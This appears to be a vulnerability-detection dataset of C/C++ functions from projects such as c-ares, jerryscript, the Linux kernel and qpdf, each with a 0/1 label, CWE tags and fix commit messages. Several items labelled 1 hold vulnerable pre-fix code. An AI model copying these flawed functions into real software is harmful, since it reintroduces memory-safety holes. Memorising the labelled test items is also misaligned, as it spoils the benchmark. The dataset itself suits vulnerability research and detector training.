const short_policy_entry_t *e = &policy->entries[i];
if (e->min_port == e->max_port) {
smartlist_add_asprintf(sl, "%d", e->min_port);
} else {
smartlist_add_asprintf(sl, "%d-%d", e->min_port, e->max_port);
}
if (i < policy->n_entries-1)
smartlist_add(sl, tor_strdup(","));
}
answer = smartlist_join_strings(sl, "", 0, NULL);
SMARTLIST_FOREACH(sl, char *, a, tor_free(a));
smartlist_free(sl);
return answer;
}
| 0 |
[] |
tor
|
1afc2ed956a35b40dfd1d207652af5b50c295da7
| 73,785,717,287,477,060,000,000,000,000,000,000,000 | 23 |
Fix policies.c instance of the "if (r=(a-b)) return r" pattern
I think this one probably can't underflow, since the input ranges
are small. But let's not tempt fate.
This patch also replaces the "cmp" functions here with just "eq"
functions, since nothing actually checked for anything besides 0 and
nonzero.
Related to 21278.
|
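The "if (r=(a-b)) return r" pattern the message refers to derives a comparison result from subtraction, which overflows for extreme operands. A small illustration of the fragile shape and the safe replacement; as the message notes, the actual patch went further and used equality-only helpers, since callers only tested zero versus nonzero.

#include <limits.h>

/* Fragile: for a = INT_MAX, b = -1 the subtraction overflows (undefined
 * behavior in C), and even in-range results can report the wrong sign. */
int cmp_by_subtraction(int a, int b)
{
    return a - b;   /* DON'T */
}

/* Safe: explicit comparisons, no arithmetic on the operands. */
int cmp_safe(int a, int b)
{
    if (a < b) return -1;
    if (a > b) return 1;
    return 0;
}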
static inline void tcp_mark_push(struct tcp_sock *tp, struct sk_buff *skb)
{
TCP_SKB_CB(skb)->flags |= TCPCB_FLAG_PSH;
tp->pushed_seq = tp->write_seq;
}
| 0 |
[
"CWE-400",
"CWE-119",
"CWE-703"
] |
linux
|
baff42ab1494528907bf4d5870359e31711746ae
| 307,963,994,136,587,300,000,000,000,000,000,000,000 | 5 |
net: Fix oops from tcp_collapse() when using splice()
tcp_read_sock() can eat skbs without immediately advancing copied_seq.
This can cause a panic in tcp_collapse() if it is called as a result
of the recv_actor dropping the socket lock.
A userspace program that splices data from a socket to either another
socket or to a file can trigger this bug.
Signed-off-by: Steven J. Magnani <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
static const char *get_type_string(cmark_syntax_extension *self,
cmark_node *node) {
if (node->type == CMARK_NODE_TABLE) {
return "table";
} else if (node->type == CMARK_NODE_TABLE_ROW) {
if (((node_table_row *)node->as.opaque)->is_header)
return "table_header";
else
return "table_row";
} else if (node->type == CMARK_NODE_TABLE_CELL) {
return "table_cell";
}
return "<unknown>";
}
| 0 |
[
"CWE-190"
] |
cmark-gfm
|
b1687e6af1367c596ab75428b03af55666a66530
| 301,795,908,842,409,170,000,000,000,000,000,000,000 | 15 |
prevent integer overflow in row_from_string
* added explicit check for UINT16_MAX boundary on row->n_columns
* added additional checks for row_from_string NULL returns to prevent NULL
dereferences on error cases
* added additional check to ensure n_columns between marker and header rows
always match prior to any alignment processing
* allocate alignment array based on marker rows rather than header rows
* prevent memory leak on dangling node when encountering row_from_string
error in try_opening_table_row
* add explicit integer overflow error marker to not overload offset semantics
in row_from_string with other implied error conditions
|
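The first item in the message above adds an explicit UINT16_MAX bound before a counted column number is stored in a 16-bit field. A generic sketch of that check (the function and field names are illustrative, not cmark-gfm's):

#include <stdint.h>
#include <stddef.h>

/* Store a counted value into a uint16_t field only when it fits;
 * without the check, the cast silently truncates and later
 * allocations sized from the field are too small. */
static int set_column_count(uint16_t *n_columns_out, size_t counted)
{
    if (counted > UINT16_MAX)
        return -1;   /* explicit integer-overflow error marker */
    *n_columns_out = (uint16_t) counted;
    return 0;
}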
ares_parse_naptr_reply (const unsigned char *abuf, int alen,
struct ares_naptr_reply **naptr_out)
{
unsigned int qdcount, ancount, i;
const unsigned char *aptr, *vptr;
int status, rr_type, rr_class, rr_len;
long len;
char *hostname = NULL, *rr_name = NULL;
struct ares_naptr_reply *naptr_head = NULL;
struct ares_naptr_reply *naptr_last = NULL;
struct ares_naptr_reply *naptr_curr;
/* Set *naptr_out to NULL for all failure cases. */
*naptr_out = NULL;
/* Give up if abuf doesn't have room for a header. */
if (alen < HFIXEDSZ)
return ARES_EBADRESP;
/* Fetch the question and answer count from the header. */
qdcount = DNS_HEADER_QDCOUNT (abuf);
ancount = DNS_HEADER_ANCOUNT (abuf);
if (qdcount != 1)
return ARES_EBADRESP;
if (ancount == 0)
return ARES_ENODATA;
/* Expand the name from the question, and skip past the question. */
aptr = abuf + HFIXEDSZ;
status = ares_expand_name (aptr, abuf, alen, &hostname, &len);
if (status != ARES_SUCCESS)
return status;
if (aptr + len + QFIXEDSZ > abuf + alen)
{
ares_free (hostname);
return ARES_EBADRESP;
}
aptr += len + QFIXEDSZ;
/* Examine each answer resource record (RR) in turn. */
for (i = 0; i < ancount; i++)
{
/* Decode the RR up to the data field. */
status = ares_expand_name (aptr, abuf, alen, &rr_name, &len);
if (status != ARES_SUCCESS)
{
break;
}
aptr += len;
if (aptr + RRFIXEDSZ > abuf + alen)
{
status = ARES_EBADRESP;
break;
}
rr_type = DNS_RR_TYPE (aptr);
rr_class = DNS_RR_CLASS (aptr);
rr_len = DNS_RR_LEN (aptr);
aptr += RRFIXEDSZ;
if (aptr + rr_len > abuf + alen)
{
status = ARES_EBADRESP;
break;
}
/* RR must contain at least 7 bytes = 2 x int16 + 3 x name */
if (rr_len < 7)
{
status = ARES_EBADRESP;
break;
}
/* Check if we are really looking at a NAPTR record */
if (rr_class == C_IN && rr_type == T_NAPTR)
{
/* parse the NAPTR record itself */
/* Allocate storage for this NAPTR answer appending it to the list */
naptr_curr = ares_malloc_data(ARES_DATATYPE_NAPTR_REPLY);
if (!naptr_curr)
{
status = ARES_ENOMEM;
break;
}
if (naptr_last)
{
naptr_last->next = naptr_curr;
}
else
{
naptr_head = naptr_curr;
}
naptr_last = naptr_curr;
vptr = aptr;
naptr_curr->order = DNS__16BIT(vptr);
vptr += sizeof(unsigned short);
naptr_curr->preference = DNS__16BIT(vptr);
vptr += sizeof(unsigned short);
status = ares_expand_string(vptr, abuf, alen, &naptr_curr->flags, &len);
if (status != ARES_SUCCESS)
break;
vptr += len;
status = ares_expand_string(vptr, abuf, alen, &naptr_curr->service, &len);
if (status != ARES_SUCCESS)
break;
vptr += len;
status = ares_expand_string(vptr, abuf, alen, &naptr_curr->regexp, &len);
if (status != ARES_SUCCESS)
break;
vptr += len;
status = ares_expand_name(vptr, abuf, alen, &naptr_curr->replacement, &len);
if (status != ARES_SUCCESS)
break;
}
/* Don't lose memory in the next iteration */
ares_free (rr_name);
rr_name = NULL;
/* Move on to the next record */
aptr += rr_len;
}
if (hostname)
ares_free (hostname);
if (rr_name)
ares_free (rr_name);
/* clean up on error */
if (status != ARES_SUCCESS)
{
if (naptr_head)
ares_free_data (naptr_head);
return status;
}
/* everything looks fine, return the data */
*naptr_out = naptr_head;
return ARES_SUCCESS;
}
| 1 |
[
"CWE-200"
] |
c-ares
|
18ea99693d63f957ecb670045adbd2c1da8a4641
| 92,817,310,620,354,770,000,000,000,000,000,000,000 | 145 |
ares_parse_naptr_reply: make buffer length check more accurate
9478908a490a6bf009ba58d81de8c1d06d50a117 introduced a length check
for records parsed by `ares_parse_naptr_reply()`. However, that
function is designed to parse replies which also contain non-NAPTR
records; for A records, the `rr_len > 7` check will fail as there
are only 4 bytes of payload.
In particular, parsing ANY replies for NAPTR records was broken
by that patch.
Fix that by moving the check into the case in which it is already
known that the record is a NAPTR record.
|
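The essence of the fix above is check placement: a NAPTR-specific minimum length must be enforced only once the record is known to be NAPTR, because ANY replies interleave record types with smaller payloads (an A record carries just 4 bytes). A simplified sketch of the corrected control flow; pulling C_IN and T_NAPTR from the system nameser headers is an assumption about the build environment.

#include <ares.h>
#include <arpa/nameser.h>   /* C_IN, T_NAPTR on common platforms */

/* Validate one decoded resource record before NAPTR field parsing. */
static int check_rr_for_naptr(int rr_class, int rr_type, int rr_len)
{
    if (rr_class == C_IN && rr_type == T_NAPTR) {
        /* NAPTR payload needs at least 2 x int16 + 3 x names = 7 bytes.
         * Enforcing this before the type is known would wrongly reject
         * the 4-byte A records that share an ANY response. */
        if (rr_len < 7)
            return ARES_EBADRESP;
    }
    return ARES_SUCCESS;   /* non-NAPTR records are simply skipped */
}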
TEST_F(HttpConnectionManagerConfigTest, DEPRECATED_FEATURE_TEST(DeprecatedExtensionFilterName)) {
const std::string deprecated_name = "envoy.http_connection_manager";
ASSERT_NE(
nullptr,
Registry::FactoryRegistry<Server::Configuration::NamedNetworkFilterConfigFactory>::getFactory(
deprecated_name));
}
| 0 |
[
"CWE-22"
] |
envoy
|
5333b928d8bcffa26ab19bf018369a835f697585
| 3,097,148,148,299,997,000,000,000,000,000,000,000 | 8 |
Implement handling of escaped slash characters in URL path
Fixes: CVE-2021-29492
Signed-off-by: Yan Avlasov <[email protected]>
|
int managesieve_parser_read_args
(struct managesieve_parser *parser, unsigned int count,
enum managesieve_parser_flags flags, const struct managesieve_arg **args_r)
{
parser->flags = flags;
while ( !parser->eol && (count == 0 || IS_UNFINISHED(parser)
|| array_count(&parser->root_list) < count) ) {
if ( !managesieve_parser_read_arg(parser) )
break;
if ( parser->line_size > parser->max_line_size ) {
parser->error = "MANAGESIEVE command line too large";
break;
}
}
if ( parser->error != NULL ) {
/* error, abort */
parser->line_size += parser->cur_pos;
i_stream_skip(parser->input, parser->cur_pos);
parser->cur_pos = 0;
*args_r = NULL;
return -1;
} else if ( (!IS_UNFINISHED(parser) && count > 0
&& array_count(&parser->root_list) >= count) || parser->eol ) {
/* all arguments read / end of line. */
return finish_line(parser, count, args_r);
} else {
/* need more data */
*args_r = NULL;
return -2;
}
}
| 0 |
[
"CWE-787"
] |
pigeonhole
|
7ce9990a5e6ba59e89b7fe1c07f574279aed922c
| 61,305,857,850,872,970,000,000,000,000,000,000,000 | 34 |
lib-managesieve: Don't accept strings with NULs
ManageSieve doesn't allow NULs in strings.
This fixes a bug with unescaping a string with NULs: str_unescape() could
have been called for memory that points outside the allocated string,
causing heap corruption. This could cause crashes or theoretically even
result in remote code execution exploit.
Found by Nick Roessler and Rafi Rubin
|
int blkid_partitions_strcpy_ptuuid(blkid_probe pr, char *str)
{
struct blkid_chain *chn = blkid_probe_get_chain(pr);
if (chn->binary || !str || !*str)
return 0;
if (!blkid_probe_set_value(pr, "PTUUID", (unsigned char *) str, strlen(str) + 1))
return -ENOMEM;
return 0;
}
| 0 |
[] |
util-linux
|
50d1594c2e6142a3b51d2143c74027480df082e0
| 282,200,330,723,627,080,000,000,000,000,000,000,000 | 12 |
libblkid: avoid non-empty recursion in EBR
This is extension to the patch 7164a1c34d18831ac61c6744ad14ce916d389b3f.
We also need to detect non-empty recursion in the EBR chain. It's
possible to create standard valid logical partitions and have the last one
point back to the EBR chain. In this case all offsets will be non-empty.
Unfortunately, it's valid to create logical partitions that are not in
the "disk order" (sorted by start offset). So a link pointing backward is
valid, but it cannot point to an already existing partition
(otherwise we will see recursion).
This patch forces libblkid to ignore duplicate logical partitions; the
duplicate chain segment is interpreted as a non-data segment, and after 100
iterations with non-data segments it will break the loop -- no memory
is allocated in this case by the loop.
Addresses: https://bugzilla.redhat.com/show_bug.cgi?id=1349536
References: http://seclists.org/oss-sec/2016/q3/40
Signed-off-by: Karel Zak <[email protected]>
|
static word32 IndefItems_Len(IndefItems* items)
{
return items->len[items->idx].len;
}
| 0 |
[
"CWE-125",
"CWE-345"
] |
wolfssl
|
f93083be72a3b3d956b52a7ec13f307a27b6e093
| 151,297,463,294,470,220,000,000,000,000,000,000,000 | 4 |
OCSP: improve handling of OCSP no check extension
|
SCTP_STATIC int __sctp_setsockopt_connectx(struct sock* sk,
struct sockaddr __user *addrs,
int addrs_size,
sctp_assoc_t *assoc_id)
{
int err = 0;
struct sockaddr *kaddrs;
SCTP_DEBUG_PRINTK("%s - sk %p addrs %p addrs_size %d\n",
__func__, sk, addrs, addrs_size);
if (unlikely(addrs_size <= 0))
return -EINVAL;
/* Check the user passed a healthy pointer. */
if (unlikely(!access_ok(VERIFY_READ, addrs, addrs_size)))
return -EFAULT;
/* Alloc space for the address array in kernel memory. */
kaddrs = kmalloc(addrs_size, GFP_KERNEL);
if (unlikely(!kaddrs))
return -ENOMEM;
if (__copy_from_user(kaddrs, addrs, addrs_size)) {
err = -EFAULT;
} else {
err = __sctp_connect(sk, kaddrs, addrs_size, assoc_id);
}
kfree(kaddrs);
return err;
}
| 0 |
[] |
linux-2.6
|
5e739d1752aca4e8f3e794d431503bfca3162df4
| 160,019,204,449,067,600,000,000,000,000,000,000,000 | 33 |
sctp: fix potential panics in the SCTP-AUTH API.
All of the SCTP-AUTH socket options could cause a panic
if the extension is disabled and the API is invoked.
Additionally, there were some additional assumptions that
certain pointers would always be valid which may not
always be the case.
This patch hardens the API and address all of the crash
scenarios.
Signed-off-by: Vlad Yasevich <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
static int has_sha1_pack_kept_or_nonlocal(const unsigned char *sha1)
{
static struct packed_git *last_found = (void *)1;
struct packed_git *p;
p = (last_found != (void *)1) ? last_found : packed_git;
while (p) {
if ((!p->pack_local || p->pack_keep) &&
find_pack_entry_one(sha1, p)) {
last_found = p;
return 1;
}
if (p == last_found)
p = packed_git;
else
p = p->next;
if (p == last_found)
p = p->next;
}
return 0;
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
git
|
de1e67d0703894cb6ea782e36abb63976ab07e60
| 8,587,352,776,023,511,000,000,000,000,000,000,000 | 22 |
list-objects: pass full pathname to callbacks
When we find a blob at "a/b/c", we currently pass this to
our show_object_fn callbacks as two components: "a/b/" and
"c". Callbacks which want the full value then call
path_name(), which concatenates the two. But this is an
inefficient interface; the path is a strbuf, and we could
simply append "c" to it temporarily, then roll back the
length, without creating a new copy.
So we could improve this by teaching the callsites of
path_name() this trick (and there are only 3). But we can
also notice that no callback actually cares about the
broken-down representation, and simply pass each callback
the full path "a/b/c" as a string. The callback code becomes
even simpler, then, as we do not have to worry about freeing
an allocated buffer, nor rolling back our modification to
the strbuf.
This is theoretically less efficient, as some callbacks
would not bother to format the final path component. But in
practice this is not measurable. Since we use the same
strbuf over and over, our work to grow it is amortized, and
we really only pay to memcpy a few bytes.
Signed-off-by: Jeff King <[email protected]>
Signed-off-by: Junio C Hamano <[email protected]>
|
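The message above hinges on one buffer trick: append the leaf name to the shared path buffer, hand the full string to the callback, then restore the saved length, so no per-entry allocation or copy is needed. A minimal self-contained sketch with a plain length-tracked buffer standing in for git's strbuf:

#include <string.h>
#include <stddef.h>

struct buf { char s[4096]; size_t len; };

static void buf_append(struct buf *b, const char *str)
{
    size_t n = strlen(str);
    if (b->len + n + 1 <= sizeof(b->s)) {
        memcpy(b->s + b->len, str, n);
        b->len += n;
        b->s[b->len] = '\0';
    }
}

/* Form "a/b/c" from base "a/b/" and leaf "c" without allocating:
 * append, pass the full path to the callback, then roll back. */
static void show_entry(struct buf *base, const char *leaf,
                       void (*cb)(const char *full_path))
{
    size_t saved = base->len;   /* length of "a/b/" */
    buf_append(base, leaf);     /* temporarily "a/b/c" */
    cb(base->s);
    base->len = saved;          /* O(1) rollback for the next entry */
    base->s[saved] = '\0';
}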
free_imported(cctx_T *cctx)
{
int idx;
for (idx = 0; idx < cctx->ctx_imports.ga_len; ++idx)
{
imported_T *import = ((imported_T *)cctx->ctx_imports.ga_data) + idx;
vim_free(import->imp_name);
}
ga_clear(&cctx->ctx_imports);
}
| 0 |
[
"CWE-416"
] |
vim
|
9c23f9bb5fe435b28245ba8ac65aa0ca6b902c04
| 277,474,446,676,106,800,000,000,000,000,000,000,000 | 12 |
patch 8.2.3902: Vim9: double free with nested :def function
Problem: Vim9: double free with nested :def function.
Solution: Pass "line_to_free" from compile_def_function() and make sure
cmdlinep is valid.
|
void MainWindow::on_actionOpenOther_triggered()
{
// these static are used to open dialog with previous configuration
OpenOtherDialog dialog(this);
if (MLT.producer())
dialog.load(MLT.producer());
if (dialog.exec() == QDialog::Accepted) {
closeProducer();
open(dialog.newProducer(MLT.profile()));
}
}
| 0 |
[
"CWE-89",
"CWE-327",
"CWE-295"
] |
shotcut
|
f008adc039642307f6ee3378d378cdb842e52c1d
| 156,012,633,933,872,040,000,000,000,000,000,000,000 | 12 |
fix upgrade check is not using TLS correctly
|
static void run_again(struct ieee80211_sub_if_data *sdata,
unsigned long timeout)
{
sdata_assert_lock(sdata);
if (!timer_pending(&sdata->u.mgd.timer) ||
time_before(timeout, sdata->u.mgd.timer.expires))
mod_timer(&sdata->u.mgd.timer, timeout);
}
| 0 |
[] |
linux
|
79c92ca42b5a3e0ea172ea2ce8df8e125af237da
| 189,082,136,417,175,660,000,000,000,000,000,000,000 | 9 |
mac80211: handle deauthentication/disassociation from TDLS peer
When receiving a deauthentication/disassociation frame from a TDLS
peer, a station should not disconnect the current AP, but only
disable the current TDLS link if it's enabled.
Without this change, a TDLS issue can be reproduced by following the
steps as below:
1. STA-1 and STA-2 are connected to AP, bidirection traffic is running
between STA-1 and STA-2.
2. Set up TDLS link between STA-1 and STA-2, stay for a while, then
teardown TDLS link.
3. Repeat step #2 and monitor the connection between STA and AP.
During the test, one STA may send a deauthentication/disassociation
frame to another, after TDLS teardown, with reason code 6/7, which
means: Class 2/3 frame received from nonassociated STA.
On receive this frame, the receiver STA will disconnect the current
AP and then reconnect. It's not a expected behavior, purpose of this
frame should be disabling the TDLS link, not the link with AP.
Cc: [email protected]
Signed-off-by: Yu Wang <[email protected]>
Signed-off-by: Johannes Berg <[email protected]>
|
Optimized(const boost::intrusive_ptr<ExpressionContext>& expCtx,
const ValueSet& cachedRhsSet,
const ExpressionVector& operands)
: ExpressionSetIsSubset(expCtx), _cachedRhsSet(cachedRhsSet) {
_children = operands;
}
| 0 |
[
"CWE-190"
] |
mongo
|
21d8699ed6c517b45e1613e20231cd8eba894985
| 176,722,287,246,534,020,000,000,000,000,000,000,000 | 6 |
SERVER-43699 $mod should not overflow for large negative values
|
static void remove_hugetlb_page_for_demote(struct hstate *h, struct page *page,
bool adjust_surplus)
{
__remove_hugetlb_page(h, page, adjust_surplus, true);
}
| 0 |
[] |
linux
|
a4a118f2eead1d6c49e00765de89878288d4b890
| 330,930,930,551,887,640,000,000,000,000,000,000,000 | 5 |
hugetlbfs: flush TLBs correctly after huge_pmd_unshare
When __unmap_hugepage_range() calls to huge_pmd_unshare() succeed, a TLB
flush is missing. This TLB flush must be performed before releasing the
i_mmap_rwsem, in order to prevent an unshared PMDs page from being
released and reused before the TLB flush took place.
Arguably, a comprehensive solution would use mmu_gather interface to
batch the TLB flushes and the PMDs page release, however it is not an
easy solution: (1) try_to_unmap_one() and try_to_migrate_one() also call
huge_pmd_unshare() and they cannot use the mmu_gather interface; and (2)
deferring the release of the page reference for the PMDs page until
after i_mmap_rwsem is dropeed can confuse huge_pmd_unshare() into
thinking PMDs are shared when they are not.
Fix __unmap_hugepage_range() by adding the missing TLB flush, and
forcing a flush when unshare is successful.
Fixes: 24669e58477e ("hugetlb: use mmu_gather instead of a temporary linked list for accumulating pages)" # 3.6
Signed-off-by: Nadav Amit <[email protected]>
Reviewed-by: Mike Kravetz <[email protected]>
Cc: Aneesh Kumar K.V <[email protected]>
Cc: KAMEZAWA Hiroyuki <[email protected]>
Cc: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
ecma_snapshot_get_literal (const uint8_t *literal_base_p, /**< literal start */
ecma_value_t literal_value) /**< string / number offset */
{
JERRY_ASSERT ((literal_value & ECMA_VALUE_TYPE_MASK) == ECMA_TYPE_SNAPSHOT_OFFSET);
const uint8_t *literal_p = literal_base_p + (literal_value >> JERRY_SNAPSHOT_LITERAL_SHIFT);
if (literal_value & JERRY_SNAPSHOT_LITERAL_IS_NUMBER)
{
ecma_number_t num;
memcpy (&num, literal_p, sizeof (ecma_number_t));
return ecma_find_or_create_literal_number (num);
}
#if JERRY_BUILTIN_BIGINT
if (literal_value & JERRY_SNAPSHOT_LITERAL_IS_BIGINT)
{
uint32_t bigint_sign_and_size = *(uint32_t *) literal_p;
uint32_t size = bigint_sign_and_size & ~(uint32_t) (sizeof (ecma_bigint_digit_t) - 1);
ecma_extended_primitive_t *bigint_p = ecma_bigint_create (size);
if (bigint_p == NULL)
{
jerry_fatal (ERR_OUT_OF_MEMORY);
}
/* Only the sign bit can differ. */
JERRY_ASSERT (bigint_p->u.bigint_sign_and_size == (bigint_sign_and_size & ~(uint32_t) ECMA_BIGINT_SIGN));
bigint_p->u.bigint_sign_and_size = bigint_sign_and_size;
memcpy (ECMA_BIGINT_GET_DIGITS (bigint_p, 0), literal_p + sizeof (uint32_t), size);
return ecma_find_or_create_literal_bigint (ecma_make_extended_primitive_value (bigint_p, ECMA_TYPE_BIGINT));
}
#endif /* JERRY_BUILTIN_BIGINT */
uint16_t length = *(const uint16_t *) literal_p;
return ecma_find_or_create_literal_string (literal_p + sizeof (uint16_t), length);
} /* ecma_snapshot_get_literal */
| 1 |
[
"CWE-416"
] |
jerryscript
|
3bcd48f72d4af01d1304b754ef19fe1a02c96049
| 223,753,260,190,128,900,000,000,000,000,000,000,000 | 40 |
Improve parse_identifier (#4691)
ASCII string length is no longer computed during string allocation.
JerryScript-DCO-1.0-Signed-off-by: Daniel Batiz [email protected]
|
static void nhmldump_send_frame(GF_NHMLDumpCtx *ctx, char *data, u32 data_size, GF_FilterPacket *pck)
{
GF_FilterPacket *dst_pck;
char nhml[1024];
const GF_PropertyValue *p;
u32 size;
u8 *output;
GF_FilterSAPType sap = gf_filter_pck_get_sap(pck);
u64 dts = gf_filter_pck_get_dts(pck);
u64 cts = gf_filter_pck_get_cts(pck);
if (dts==GF_FILTER_NO_TS) dts = cts;
if (cts==GF_FILTER_NO_TS) cts = dts;
ctx->pck_num++;
sprintf(nhml, "<NHNTSample number=\"%d\" DTS=\""LLU"\" dataLength=\"%d\" ", ctx->pck_num, dts, data_size);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
if (ctx->pckp || (cts != dts) ) {
sprintf(nhml, "CTSOffset=\"%d\" ", (s32) ((s64)cts - (s64)dts));
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
if (sap==GF_FILTER_SAP_1) {
sprintf(nhml, "isRAP=\"yes\" ");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
} else if (sap) {
sprintf(nhml, "SAPType=\"%d\" ", sap);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
} else if (ctx->pckp) {
sprintf(nhml, "isRAP=\"no\" ");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
if ((sap==GF_FILTER_SAP_4) || (sap==GF_FILTER_SAP_4_PROL)) {
s32 roll = gf_filter_pck_get_roll_info(pck);
sprintf(nhml, "SAPType=\"4\" %s=\"%d\" ", (sap==GF_FILTER_SAP_4_PROL) ? "prol" : "roll", roll);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
}
if (ctx->pckp) {
u64 bo;
u32 duration, idx;
sprintf(nhml, "mediaOffset=\""LLU"\" ", ctx->mdia_pos);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
bo = gf_filter_pck_get_byte_offset(pck);
if (bo!=GF_FILTER_NO_BO) {
sprintf(nhml, "sourceByteOffset=\""LLU"\" ", bo);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
duration = gf_filter_pck_get_duration(pck);
if (duration) {
sprintf(nhml, "duration=\"%d\" ", duration);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
idx = gf_filter_pck_get_carousel_version(pck);
if (idx) {
sprintf(nhml, "carouselVersion=\"%d\" ", idx);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
idx = 0;
while (1) {
u32 prop_4cc;
const char *prop_name;
p = gf_filter_pck_enum_properties(pck, &idx, &prop_4cc, &prop_name);
if (!p) break;
if (prop_4cc == GF_PROP_PCK_SUBS) continue;
nhmldump_pck_property(ctx, prop_4cc, prop_name, p);
}
}
if (ctx->chksum) {
if (ctx->chksum==1) {
u32 crc = gf_crc_32(data, data_size);
sprintf(nhml, "crc=\"%08X\" ", crc);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
} else {
u32 j;
u8 hash[GF_SHA1_DIGEST_SIZE];
gf_sha1_csum(data, data_size, hash);
sprintf(nhml, "sha1=\"");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
for (j=0; j<20; j++) {
sprintf(nhml, "%02X", hash[j]);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
sprintf(nhml, "\" ");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
}
sprintf(nhml, ">\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
p = gf_filter_pck_get_property(pck, GF_PROP_PCK_SUBS);
if (p) {
u32 offset_in_sample = 0;
Bool first_subs = GF_TRUE;
if (!ctx->bs_r) ctx->bs_r = gf_bs_new(p->value.data.ptr, p->value.data.size, GF_BITSTREAM_READ);
else gf_bs_reassign_buffer(ctx->bs_r, p->value.data.ptr, p->value.data.size);
//(data) binary blob containing N [(u32)flags(u32)size(u32)reserved(u8)priority(u8) discardable]
while (gf_bs_available(ctx->bs_r)) {
u32 s_flags = gf_bs_read_u32(ctx->bs_r);
u32 s_size = gf_bs_read_u32(ctx->bs_r);
u32 s_res = gf_bs_read_u32(ctx->bs_r);
u8 s_prio = gf_bs_read_u8(ctx->bs_r);
u8 s_discard = gf_bs_read_u8(ctx->bs_r);
if (offset_in_sample + s_size > data_size) {
GF_LOG(GF_LOG_ERROR, GF_LOG_MEDIA, ("Wrong subsample info: sample size %d vs subsample offset+size %d\n", data_size, offset_in_sample + s_size));
break;
}
if (ctx->is_stpp && ctx->nhmlonly) {
if (first_subs) {
sprintf(nhml, "<NHNTSubSample>\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
gf_bs_write_data(ctx->bs_w, data, s_size);
sprintf(nhml, "</NHNTSubSample>\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
} else {
u32 d_size;
if (ctx->b64_buffer_size < 2*s_size + 3) {
ctx->b64_buffer_size = 2 * s_size + 3;
ctx->b64_buffer = gf_realloc(ctx->b64_buffer, ctx->b64_buffer_size);
}
d_size = gf_base64_encode(data + offset_in_sample, s_size, ctx->b64_buffer, ctx->b64_buffer_size);
ctx->b64_buffer[d_size] = 0;
sprintf(nhml, "<NHNTSubSample data=\"data:application/octet-string;base64,");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
gf_bs_write_data(ctx->bs_w, ctx->b64_buffer, d_size);
sprintf(nhml, "\">\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
} else {
sprintf(nhml, "<NHNTSubSample size=\"%d\" flags=\"%d\" reserved=\"%d\" priority=\"%d\" discard=\"%d\" />\n", s_size, s_flags, s_res, s_prio, s_discard);
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
first_subs = GF_FALSE;
}
} else if (ctx->is_stpp && ctx->nhmlonly) {
sprintf(nhml, "<NHNTSubSample><![CDATA[\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
gf_bs_write_data(ctx->bs_w, data, data_size);
sprintf(nhml, "]]></NHNTSubSample>\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
}
sprintf(nhml, "</NHNTSample>\n");
gf_bs_write_data(ctx->bs_w, nhml, (u32) strlen(nhml));
gf_bs_get_content_no_truncate(ctx->bs_w, &ctx->nhml_buffer, &size, &ctx->nhml_buffer_size);
if (ctx->filep) {
gf_fwrite(ctx->nhml_buffer, size, ctx->filep);
return;
}
dst_pck = gf_filter_pck_new_alloc(ctx->opid_nhml, size, &output);
if (dst_pck) {
memcpy(output, ctx->nhml_buffer, size);
gf_filter_pck_set_framing(dst_pck, GF_FALSE, GF_FALSE);
gf_filter_pck_send(dst_pck);
}
ctx->mdia_pos += data_size;
if (ctx->opid_mdia) {
//send the complete data packet
dst_pck = gf_filter_pck_new_ref(ctx->opid_mdia, 0, data_size, pck);
if (!dst_pck) return;
gf_filter_pck_merge_properties(pck, dst_pck);
//keep byte offset ?
// gf_filter_pck_set_byte_offset(dst_pck, GF_FILTER_NO_BO);
gf_filter_pck_set_framing(dst_pck, ctx->first, GF_FALSE);
gf_filter_pck_send(dst_pck);
}
}
| 0 |
[
"CWE-787"
] |
gpac
|
ea1eca00fd92fa17f0e25ac25652622924a9a6a0
| 308,370,927,874,366,350,000,000,000,000,000,000,000 | 181 |
fixed #2138
|
compute_U_value_R3(std::string const& user_password,
QPDF::EncryptionData const& data)
{
// Algorithm 3.5 from the PDF 1.7 Reference Manual
std::string k1 = QPDF::compute_encryption_key(user_password, data);
MD5 md5;
md5.encodeDataIncrementally(
pad_or_truncate_password_V4("").c_str(), key_bytes);
md5.encodeDataIncrementally(data.getId1().c_str(),
data.getId1().length());
MD5::Digest digest;
md5.digest(digest);
pad_short_parameter(k1, data.getLengthBytes());
iterate_rc4(digest, sizeof(MD5::Digest),
QUtil::unsigned_char_pointer(k1),
data.getLengthBytes(), 20, false);
char result[key_bytes];
memcpy(result, digest, sizeof(MD5::Digest));
// pad with arbitrary data -- make it consistent for the sake of
// testing
for (unsigned int i = sizeof(MD5::Digest); i < key_bytes; ++i)
{
result[i] = static_cast<char>((i * i) % 0xff);
}
return std::string(result, key_bytes);
}
| 1 |
[
"CWE-787"
] |
qpdf
|
d71f05ca07eb5c7cfa4d6d23e5c1f2a800f52e8e
| 159,706,500,661,063,770,000,000,000,000,000,000,000 | 27 |
Fix sign and conversion warnings (major)
